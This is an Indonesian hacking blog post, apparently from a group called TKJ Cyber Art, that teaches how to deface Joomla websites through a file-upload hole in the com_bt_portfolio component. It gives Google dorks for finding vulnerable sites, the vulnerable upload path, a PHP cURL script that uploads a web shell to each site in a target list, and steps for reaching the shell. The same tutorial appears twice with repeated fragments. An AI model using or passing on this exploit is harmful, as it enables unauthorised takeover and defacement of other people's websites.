Hallo fans, Nuenomaru disini , maaf baru bisa posting lagi wkwkw
2 postingan/artikel sebelumnya saya share tutorial bug/celah pada web berCMS Wordpress.
untuk artikel hari ini saya akan share salah satu bug/celah web berCMS Joomla
1. Search di google dgn dork:
Dork:
inurl:/index.php?option=com_bt_portfolio
inurl:/bt_portfolio
(Kembangin lg biar dpt banyak web yg vuln and verawan kak)
2. Pilih salah satu web target, dan masukan exploit:
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
3. Vuln = Blank
(kalo gak salah wkwkwk)
4).Buat File Baru Berekstensi .php Contoh btport.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn btport.php tadi
<?php
$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Uploading file to : ".$site;
$uploadfile="shell.php";
$ch =curl_init("trget/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);{
print "\n\n\n$postResult";
echo "\n\n\t";
}
}
?>
4. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
5. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php
6. jika sukses , akan muncul nama shell sobat di CMD
7. Shell Akses: www.target.co.li/namashellsobat.php
Hahahaha Sekian tutorial kali ini.
numpang ngiklan..
Download MiniGames Android TKJ JumpMan.
<re/code> By: TKJ Cyber Art
Link:
- Google Drive
- sharebeast
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy Joomla Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to: Idiot Attacker
./Nuenomaru
2 postingan/artikel sebelumnya saya share tutorial bug/celah pada web berCMS Wordpress.
untuk artikel hari ini saya akan share salah satu bug/celah web berCMS Joomla
kali ini Nue akan share Exploit Tutorial deface dengan com Bt Portfolio, etthoo,, ini exploit gak begitu baru loh ..
hahaha iseng2 aja share kali aja masihcrotz
hahaha iseng2 aja share kali aja masih
bahan bahan:
- PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
- Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) - PC yang tersambung dengan Internet
- Xampp
- Shell & Script Deface
Langsung intip Tutorialnya
1. Search di google dgn dork:
Dork:
inurl:/index.php?option=com_bt_portfolio
inurl:/bt_portfolio
(Kembangin lg biar dpt banyak web yg vuln and verawan kak)
2. Pilih salah satu web target, dan masukan exploit:
/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
3. Vuln = Blank
(kalo gak salah wkwkwk)
4).Buat File Baru Berekstensi .php Contoh btport.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn btport.php tadi
<?php
$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Uploading file to : ".$site;
$uploadfile="shell.php";
$ch =curl_init("trget/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);{
print "\n\n\n$postResult";
echo "\n\n\t";
}
}
?>
4. Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
5. Buka CMD dan ketikan perintah
cd C:/xampp/php
php namaexploitlo.php
6. jika sukses , akan muncul nama shell sobat di CMD
7. Shell Akses: www.target.co.li/namashellsobat.php
..done..
Hahahaha Sekian tutorial kali ini.
numpang ngiklan..
Download MiniGames Android TKJ JumpMan.
<re/code> By: TKJ Cyber Art
Link:
- Google Drive
- sharebeast
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Happy Joomla Hacked !!
Sekian dan semoga bermanfaat .. terimakasih
source and thanks to: Idiot Attacker
./Nuenomaru
Visit and follow :
EmoticonEmoticon